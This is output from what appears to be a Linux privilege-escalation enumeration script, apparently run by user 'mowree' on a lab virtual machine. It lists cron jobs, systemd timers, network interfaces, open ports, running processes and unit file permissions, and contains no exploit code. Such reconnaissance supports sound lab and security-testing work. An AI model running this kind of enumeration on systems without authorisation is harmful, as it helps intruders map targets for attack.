-rwxr-xr-x 1 root root 1478 dic 7 2020 apt-compat
-rwxr-xr-x 1 root root 355 dic 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 abr 19 2019 dpkg
-rwxr-xr-x 1 root root 377 ago 29 2018 logrotate
-rwxr-xr-x 1 root root 1123 feb 10 2019 man-db
-rwxr-xr-x 1 root root 249 sep 27 2017 passwd
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 813 feb 10 2019 man-db
-rw-r--r-- 1 root root 102 oct 11 2019 .placeholder
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2022-10-25 09:09:00 CEST 22min left Tue 2022-10-25 08:39:04 CEST 7min ago phpsessionclean.timer phpsessionclean.service
Wed 2022-10-26 00:00:00 CEST 15h left Tue 2022-10-25 07:59:22 CEST 47min ago logrotate.timer logrotate.service
Wed 2022-10-26 00:00:00 CEST 15h left Tue 2022-10-25 07:59:22 CEST 47min ago man-db.timer man-db.service
Wed 2022-10-26 03:39:18 CEST 18h left Tue 2022-10-25 07:59:22 CEST 47min ago apt-daily.timer apt-daily.service
Wed 2022-10-26 06:16:21 CEST 21h left Tue 2022-10-25 07:59:22 CEST 47min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Wed 2022-10-26 08:14:24 CEST 23h left Tue 2022-10-25 08:14:24 CEST 32min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:3a:ed:42 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 360sec preferred_lft 360sec
inet6 fe80::a00:27ff:fe3a:ed42/64 scope link
valid_lft forever preferred_lft forever
[-] ARP history:
192.168.56.100 dev enp0s3 lladdr 08:00:27:2e:93:a7 STALE
192.168.56.101 dev enp0s3 lladdr 08:00:27:42:44:82 REACHABLE
[-] Nameserver(s):
nameserver 192.168.1.1
[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 103792 10004 ? Ss 07:59 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 07:59 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:59 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:59 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/0:0H-kblockd]
root 7 0.0 0.0 0 0 ? I 07:59 0:00 [kworker/u2:0-events_unbound]
root 8 0.0 0.0 0 0 ? I< 07:59 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 07:59 0:01 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 07:59 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? I 07:59 0:00 [rcu_bh]
root 12 0.0 0.0 0 0 ? S 07:59 0:00 [migration/0]
root 13 0.0 0.0 0 0 ? I 07:59 0:01 [kworker/0:1-events]
root 14 0.0 0.0 0 0 ? S 07:59 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 07:59 0:00 [kdevtmpfs]
root 16 0.0 0.0 0 0 ? I< 07:59 0:00 [netns]
root 17 0.0 0.0 0 0 ? S 07:59 0:00 [kauditd]
root 18 0.0 0.0 0 0 ? S 07:59 0:00 [khungtaskd]
root 19 0.0 0.0 0 0 ? S 07:59 0:00 [oom_reaper]
root 20 0.0 0.0 0 0 ? I< 07:59 0:00 [writeback]
root 21 0.0 0.0 0 0 ? S 07:59 0:00 [kcompactd0]
root 22 0.0 0.0 0 0 ? SN 07:59 0:00 [ksmd]
root 23 0.0 0.0 0 0 ? SN 07:59 0:00 [khugepaged]
root 24 0.0 0.0 0 0 ? I< 07:59 0:00 [crypto]
root 25 0.0 0.0 0 0 ? I< 07:59 0:00 [kintegrityd]
root 26 0.0 0.0 0 0 ? I< 07:59 0:00 [kblockd]
root 27 0.0 0.0 0 0 ? I< 07:59 0:00 [edac-poller]
root 28 0.0 0.0 0 0 ? I< 07:59 0:00 [devfreq_wq]
root 29 0.0 0.0 0 0 ? S 07:59 0:00 [watchdogd]
root 30 0.0 0.0 0 0 ? S 07:59 0:00 [kswapd0]
root 48 0.0 0.0 0 0 ? I< 07:59 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? I< 07:59 0:00 [ipv6_addrconf]
root 59 0.0 0.0 0 0 ? I< 07:59 0:00 [kstrp]
root 102 0.0 0.0 0 0 ? I< 07:59 0:00 [ata_sff]
root 106 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_0]
root 108 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_0]
root 109 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_1]
root 110 0.0 0.0 0 0 ? S 07:59 0:00 [scsi_eh_2]
root 112 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_1]
root 113 0.0 0.0 0 0 ? I< 07:59 0:00 [scsi_tmf_2]
root 114 0.0 0.0 0 0 ? I 07:59 0:00 [kworker/u2:2-events_unbound]
root 154 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/0:1H-kblockd]
root 184 0.0 0.0 0 0 ? I< 07:59 0:00 [kworker/u3:0]
root 186 0.0 0.0 0 0 ? S 07:59 0:00 [jbd2/sda1-8]
root 187 0.0 0.0 0 0 ? I< 07:59 0:00 [ext4-rsv-conver]
root 220 0.0 0.7 32168 7812 ? Ss 07:59 0:00 /lib/systemd/systemd-journald
root 236 0.0 0.4 21936 4828 ? Ss 07:59 0:00 /lib/systemd/systemd-udevd
root 283 0.0 0.0 0 0 ? I< 07:59 0:00 [ttm_swap]
root 284 0.0 0.0 0 0 ? S 07:59 0:00 [irq/18-vmwgfx]
systemd+ 319 0.0 0.6 93084 6496 ? Ssl 07:59 0:00 /lib/systemd/systemd-timesyncd
root 359 0.0 0.7 19392 7292 ? Ss 07:59 0:00 /lib/systemd/systemd-logind
root 360 0.0 0.5 9488 5584 ? Ss 07:59 0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
message+ 362 0.0 0.4 8764 4200 ? Ss 07:59 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 365 0.0 0.2 8504 2688 ? Ss 07:59 0:00 /usr/sbin/cron -f
root 367 0.0 0.3 225824 3832 ? Ssl 07:59 0:00 /usr/sbin/rsyslogd -n -iNONE
root 389 0.0 0.1 5612 1592 tty1 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 401 0.0 0.7 15852 7148 ? Ss 07:59 0:00 /usr/sbin/sshd -D
root 448 0.0 1.9 196800 19796 ? Ss 07:59 0:00 /usr/sbin/apache2 -k start
www-data 601 0.4 1.1 197044 11744 ? S 08:07 0:11 /usr/sbin/apache2 -k start
www-data 673 0.1 1.1 197044 11744 ? S 08:14 0:02 /usr/sbin/apache2 -k start
www-data 707 0.0 1.2 197188 12800 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 708 0.0 1.3 197188 13424 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 709 0.0 1.2 197180 12992 ? S 08:18 0:00 /usr/sbin/apache2 -k start
www-data 724 0.0 1.1 197044 11896 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 725 0.0 1.2 197188 12812 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 726 0.0 1.1 197044 11896 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 728 0.0 1.1 197044 11900 ? S 08:20 0:00 /usr/sbin/apache2 -k start
www-data 729 0.0 1.1 197036 11900 ? S 08:20 0:00 /usr/sbin/apache2 -k start
root 812 0.0 0.0 0 0 ? I 08:40 0:00 [kworker/0:0-ata_sff]
root 813 0.0 0.7 16600 7868 ? Ss 08:42 0:00 sshd: mowree [priv]
mowree 816 0.0 0.8 21028 8260 ? Ss 08:42 0:00 /lib/systemd/systemd --user
mowree 817 0.0 0.2 104756 2204 ? S 08:42 0:00 (sd-pam)
mowree 826 0.0 0.4 16600 4608 ? S 08:42 0:00 sshd: mowree@pts/0
mowree 827 0.0 0.4 7784 4640 pts/0 Ss 08:42 0:00 -bash
root 835 0.0 0.0 0 0 ? I 08:45 0:00 [kworker/0:2-ata_sff]
mowree 842 0.5 0.3 7568 3916 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 843 0.0 0.3 7568 3344 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 844 0.0 0.0 5556 684 pts/0 S+ 08:46 0:00 tee -a
root 1015 0.0 0.2 21936 2200 ? S 08:46 0:00 /lib/systemd/systemd-udevd
mowree 1022 0.0 0.2 7568 2720 pts/0 S+ 08:46 0:00 /bin/bash ./shell.sh
mowree 1023 0.0 0.3 10632 3120 pts/0 R+ 08:46 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
1,2M -rwxr-xr-x 1 root root 1,2M abr 18 2019 /bin/bash
1,5M -rwxr-xr-x 1 root root 1,5M jul 8 2021 /lib/systemd/systemd
144K -rwxr-xr-x 1 root root 143K jul 8 2021 /lib/systemd/systemd-journald
228K -rwxr-xr-x 1 root root 227K jul 8 2021 /lib/systemd/systemd-logind
56K -rwxr-xr-x 1 root root 55K jul 8 2021 /lib/systemd/systemd-timesyncd
664K -rwxr-xr-x 1 root root 663K jul 8 2021 /lib/systemd/systemd-udevd
64K -rwxr-xr-x 1 root root 64K ene 10 2019 /sbin/agetty
496K -rwxr-xr-x 1 root root 493K jun 3 2021 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 jul 8 2021 /sbin/init -> /lib/systemd/systemd
236K -rwxr-xr-x 1 root root 236K jul 5 2020 /usr/bin/dbus-daemon
672K -rwxr-xr-x 1 root root 672K jun 10 2021 /usr/sbin/apache2
56K -rwxr-xr-x 1 root root 55K oct 11 2019 /usr/sbin/cron
688K -rwxr-xr-x 1 root root 686K feb 26 2019 /usr/sbin/rsyslogd
792K -rwxr-xr-x 1 root root 789K ene 31 2020 /usr/sbin/sshd
[-] /etc/init.d/ binary permissions:
total 76
drwxr-xr-x 2 root root 4096 ago 16 2021 .
drwxr-xr-x 71 root root 4096 ago 16 2021 ..
-rwxr-xr-x 1 root root 8181 ago 8 2020 apache2
-rwxr-xr-x 1 root root 2489 ago 8 2020 apache-htcacheclean
-rwxr-xr-x 1 root root 3740 mar 30 2019 apparmor
-rwxr-xr-x 1 root root 1232 ago 15 2019 console-setup.sh
-rwxr-xr-x 1 root root 3059 oct 11 2019 cron
-rwxr-xr-x 1 root root 2813 jul 5 2020 dbus
-rwxr-xr-x 1 root root 3809 ene 10 2019 hwclock.sh
-rwxr-xr-x 1 root root 1479 oct 10 2016 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 feb 9 2019 kmod
-rwxr-xr-x 1 root root 4445 ago 25 2018 networking
-rwxr-xr-x 1 root root 924 may 31 2018 procps
-rwxr-xr-x 1 root root 2864 feb 26 2019 rsyslog
-rwxr-xr-x 1 root root 3939 ene 31 2020 ssh
-rwxr-xr-x 1 root root 6872 ene 29 2021 udev
[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8,1M
drwxr-xr-x 19 root root 36K ago 16 2021 system
drwxr-xr-x 3 root root 4,0K ago 16 2021 user
drwxr-xr-x 2 root root 4,0K ago 16 2021 system-sleep
drwxr-xr-x 2 root root 4,0K ago 16 2021 network
drwxr-xr-x 2 root root 4,0K ago 16 2021 catalog
drwxr-xr-x 2 root root 4,0K ago 16 2021 system-generators
drwxr-xr-x 2 root root 4,0K ago 16 2021 system-preset
drwxr-xr-x 2 root root 4,0K ago 16 2021 user-environment-generators
drwxr-xr-x 2 root root 4,0K ago 16 2021 user-preset
drwxr-xr-x 3 root root 4,0K ago 16 2021 boot
-rw-r--r-- 1 root root 2,6M jul 8 2021 libsystemd-shared-241.so
-rwxr-xr-x 1 root root 1,5M jul 8 2021 systemd
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-ac-power
-rwxr-xr-x 1 root root 22K jul 8 2021 systemd-backlight
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-binfmt
-rwxr-xr-x 1 root root 27K jul 8 2021 systemd-bless-boot
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-boot-check-no-failures
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-cgroups-agent
-rwxr-xr-x 1 root root 31K jul 8 2021 systemd-cryptsetup
-rwxr-xr-x 1 root root 19K jul 8 2021 systemd-dissect
-rwxr-xr-x 1 root root 26K jul 8 2021 systemd-fsck
-rwxr-xr-x 1 root root 27K jul 8 2021 systemd-fsckd
-rwxr-xr-x 1 root root 19K jul 8 2021 systemd-growfs
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-hibernate-resume
-rwxr-xr-x 1 root root 31K jul 8 2021 systemd-hostnamed
-rwxr-xr-x 1 root root 19K jul 8 2021 systemd-initctl
-rwxr-xr-x 1 root root 143K jul 8 2021 systemd-journald
-rwxr-xr-x 1 root root 39K jul 8 2021 systemd-localed
-rwxr-xr-x 1 root root 227K jul 8 2021 systemd-logind
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-makefs
-rwxr-xr-x 1 root root 19K jul 8 2021 systemd-modules-load
-rwxr-xr-x 1 root root 1,8M jul 8 2021 systemd-networkd
-rwxr-xr-x 1 root root 27K jul 8 2021 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-quotacheck
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-random-seed
-rwxr-xr-x 1 root root 19K jul 8 2021 systemd-remount-fs
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-reply-password
-rwxr-xr-x 1 root root 399K jul 8 2021 systemd-resolved
-rwxr-xr-x 1 root root 23K jul 8 2021 systemd-rfkill
-rwxr-xr-x 1 root root 51K jul 8 2021 systemd-shutdown
-rwxr-xr-x 1 root root 27K jul 8 2021 systemd-sleep
-rwxr-xr-x 1 root root 31K jul 8 2021 systemd-socket-proxyd
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-sulogin-shell
-rwxr-xr-x 1 root root 23K jul 8 2021 systemd-sysctl
-rwxr-xr-x 1 root root 39K jul 8 2021 systemd-timedated
-rwxr-xr-x 1 root root 55K jul 8 2021 systemd-timesyncd
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-time-wait-sync
-rwxr-xr-x 1 root root 663K jul 8 2021 systemd-udevd
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-update-utmp
-rwxr-xr-x 1 root root 18K jul 8 2021 systemd-user-runtime-dir
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-user-sessions
-rwxr-xr-x 1 root root 15K jul 8 2021 systemd-veritysetup
-rwxr-xr-x 1 root root 14K jul 8 2021 systemd-volatile-root
-rwxr-xr-x 1 root root 1,4K jul 8 2021 systemd-sysv-install
drwxr-xr-x 2 root root 4,0K ene 29 2021 system-shutdown
drwxr-xr-x 2 root root 4,0K ene 29 2021 user-generators
-rw-r--r-- 1 root root 692 feb 14 2019 resolv.conf
/lib/systemd/system:
total 764K
drwxr-xr-x 2 root root 4,0K ago 16 2021 multi-user.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 sockets.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 sysinit.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 getty.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 graphical.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 local-fs.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 rescue.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 timers.target.wants
drwxr-xr-x 2 root root 4,0K ago 16 2021 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4,0K ago 16 2021 user-.slice.d
drwxr-xr-x 2 root root 4,0K ago 16 2021 rc-local.service.d
drwxr-xr-x 2 root root 4,0K ago 16 2021 systemd-resolved.service.d
lrwxrwxrwx 1 root root 14 jul 8 2021 [email protected] -> [email protected]
lrwxrwxrwx 1 root root 9 jul 8 2021 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 checkroot.service -> /dev/null
-rw-r--r-- 1 root root 1,1K jul 8 2021 console-getty.service
-rw-r--r-- 1 root root 1,3K jul 8 2021 [email protected]
lrwxrwxrwx 1 root root 9 jul 8 2021 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 jul 8 2021 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 jul 8 2021 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 jul 8 2021 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 jul 8 2021 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 jul 8 2021 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1,1K jul 8 2021 debug-shell.service
lrwxrwxrwx 1 root root 16 jul 8 2021 default.target -> graphical.target
-rw-r--r-- 1 root root 797 jul 8 2021 emergency.service
-rw-r--r-- 1 root root 2,0K jul 8 2021 [email protected]
lrwxrwxrwx 1 root root 9 jul 8 2021 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 hwclock.service -> /dev/null
-rw-r--r-- 1 root root 670 jul 8 2021 initrd-cleanup.service
-rw-r--r-- 1 root root 830 jul 8 2021 initrd-parse-etc.service
-rw-r--r-- 1 root root 589 jul 8 2021 initrd-switch-root.service
-rw-r--r-- 1 root root 704 jul 8 2021 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root 9 jul 8 2021 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 jul 8 2021 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root 717 jul 8 2021 kmod-static-nodes.service
lrwxrwxrwx 1 root root 28 jul 8 2021 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 jul 8 2021 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 22 jul 8 2021 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root 609 jul 8 2021 quotaon.service
-rw-r--r-- 1 root root 716 jul 8 2021 rc-local.service
lrwxrwxrwx 1 root root 16 jul 8 2021 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 jul 8 2021 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 reboot.service -> /dev/null
-rw-r--r-- 1 root root 788 jul 8 2021 rescue.service
lrwxrwxrwx 1 root root 9 jul 8 2021 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 jul 8 2021 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 jul 8 2021 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 jul 8 2021 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 jul 8 2021 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 jul 8 2021 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 jul 8 2021 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 jul 8 2021 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 jul 8 2021 sendsigs.service -> /dev/null
-rw-r--r-- 1 root root 1,5K jul 8 2021 [email protected]
lrwxrwxrwx 1 root root 9 jul 8 2021 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 stop-bootlogd-single.service -> /dev/null
-rw-r--r-- 1 root root 742 jul 8 2021 systemd-ask-password-console.service
-rw-r--r-- 1 root root 752 jul 8 2021 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 752 jul 8 2021 [email protected]
-rw-r--r-- 1 root root 1,1K jul 8 2021 systemd-binfmt.service
-rw-r--r-- 1 root root 678 jul 8 2021 systemd-bless-boot.service
-rw-r--r-- 1 root root 718 jul 8 2021 systemd-boot-check-no-failures.service
-rw-r--r-- 1 root root 551 jul 8 2021 systemd-fsckd.service
-rw-r--r-- 1 root root 540 jul 8 2021 systemd-fsckd.socket
-rw-r--r-- 1 root root 740 jul 8 2021 systemd-fsck-root.service
-rw-r--r-- 1 root root 741 jul 8 2021 [email protected]
-rw-r--r-- 1 root root 584 jul 8 2021 systemd-halt.service
-rw-r--r-- 1 root root 671 jul 8 2021 [email protected]
-rw-r--r-- 1 root root 541 jul 8 2021 systemd-hibernate.service
-rw-r--r-- 1 root root 1,1K jul 8 2021 systemd-hostnamed.service
-rw-r--r-- 1 root root 818 jul 8 2021 systemd-hwdb-update.service
-rw-r--r-- 1 root root 559 jul 8 2021 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 566 jul 8 2021 systemd-initctl.service
-rw-r--r-- 1 root root 1,5K jul 8 2021 systemd-journald.service
-rw-r--r-- 1 root root 735 jul 8 2021 systemd-journal-flush.service
-rw-r--r-- 1 root root 597 jul 8 2021 systemd-kexec.service
-rw-r--r-- 1 root root 1,1K jul 8 2021 systemd-localed.service
-rw-r--r-- 1 root root 1,5K jul 8 2021 systemd-logind.service
-rw-r--r-- 1 root root 733 jul 8 2021 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 1007 jul 8 2021 systemd-modules-load.service
-rw-r--r-- 1 root root 1,9K jul 8 2021 systemd-networkd.service
-rw-r--r-- 1 root root 740 jul 8 2021 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 655 jul 8 2021 systemd-quotacheck.service
-rw-r--r-- 1 root root 792 jul 8 2021 systemd-random-seed.service
-rw-r--r-- 1 root root 798 jul 8 2021 systemd-remount-fs.service
-rw-r--r-- 1 root root 1,7K jul 8 2021 systemd-resolved.service
-rw-r--r-- 1 root root 744 jul 8 2021 systemd-rfkill.service
-rw-r--r-- 1 root root 537 jul 8 2021 systemd-suspend.service
-rw-r--r-- 1 root root 596 jul 8 2021 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root 693 jul 8 2021 systemd-sysctl.service
-rw-r--r-- 1 root root 700 jul 8 2021 systemd-sysusers.service
-rw-r--r-- 1 root root 1,1K jul 8 2021 systemd-timedated.service
-rw-r--r-- 1 root root 1,4K jul 8 2021 systemd-timesyncd.service
-rw-r--r-- 1 root root 1,2K jul 8 2021 systemd-time-wait-sync.service
-rw-r--r-- 1 root root 659 jul 8 2021 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 732 jul 8 2021 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 772 jul 8 2021 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 986 jul 8 2021 systemd-udevd.service
-rw-r--r-- 1 root root 863 jul 8 2021 systemd-udev-settle.service
-rw-r--r-- 1 root root 763 jul 8 2021 systemd-udev-trigger.service
-rw-r--r-- 1 root root 797 jul 8 2021 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 794 jul 8 2021 systemd-update-utmp.service
-rw-r--r-- 1 root root 628 jul 8 2021 systemd-user-sessions.service
-rw-r--r-- 1 root root 690 jul 8 2021 systemd-volatile-root.service
lrwxrwxrwx 1 root root 21 jul 8 2021 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 jul 8 2021 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 jul 8 2021 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 jul 8 2021 urandom.service -> systemd-random-seed.service
-rw-r--r-- 1 root root 688 jul 8 2021 [email protected]
-rw-r--r-- 1 root root 729 jul 8 2021 [email protected]
lrwxrwxrwx 1 root root 9 jul 8 2021 x11-common.service -> /dev/null
-rw-r--r-- 1 root root 342 jul 8 2021 getty-static.service
-rw-r--r-- 1 root root 395 jun 10 2021 apache2.service
-rw-r--r-- 1 root root 467 jun 10 2021 [email protected]
-rw-r--r-- 1 root root 326 abr 19 2021 apt-daily.service
-rw-r--r-- 1 root root 156 abr 19 2021 apt-daily.timer
-rw-r--r-- 1 root root 389 abr 19 2021 apt-daily-upgrade.service
-rw-r--r-- 1 root root 184 abr 19 2021 apt-daily-upgrade.timer
drwxr-xr-x 2 root root 4,0K ene 29 2021 runlevel1.target.wants
drwxr-xr-x 2 root root 4,0K ene 29 2021 runlevel2.target.wants
drwxr-xr-x 2 root root 4,0K ene 29 2021 runlevel3.target.wants
drwxr-xr-x 2 root root 4,0K ene 29 2021 runlevel4.target.wants
drwxr-xr-x 2 root root 4,0K ene 29 2021 runlevel5.target.wants
-rw-r--r-- 1 root root 603 sep 1 2020 apache-htcacheclean.service
-rw-r--r-- 1 root root 612 sep 1 2020 [email protected]
-rw-r--r-- 1 root root 380 jul 5 2020 dbus.service
-rw-r--r-- 1 root root 106 jul 5 2020 dbus.socket
-rw-r--r-- 1 root root 184 ene 31 2020 rescue-ssh.target
-rw-r--r-- 1 root root 538 ene 31 2020 ssh.service
-rw-r--r-- 1 root root 289 ene 31 2020 [email protected]
-rw-r--r-- 1 root root 216 ene 31 2020 ssh.socket
-rw-r--r-- 1 root root 316 oct 11 2019 cron.service
-rw-r--r-- 1 root root 1,2K mar 30 2019 apparmor.service
-rw-r--r-- 1 root root 435 feb 26 2019 rsyslog.service
-rw-r--r-- 1 root root 919 feb 14 2019 basic.target
-rw-r--r-- 1 root root 419 feb 14 2019 bluetooth.target
-rw-r--r-- 1 root root 455 feb 14 2019 boot-complete.target
-rw-r--r-- 1 root root 465 feb 14 2019 cryptsetup-pre.target
-rw-r--r-- 1 root root 412 feb 14 2019 cryptsetup.target
-rw-r--r-- 1 root root 750 feb 14 2019 dev-hugepages.mount
-rw-r--r-- 1 root root 665 feb 14 2019 dev-mqueue.mount
-rw-r--r-- 1 root root 471 feb 14 2019 emergency.target
-rw-r--r-- 1 root root 541 feb 14 2019 exit.target
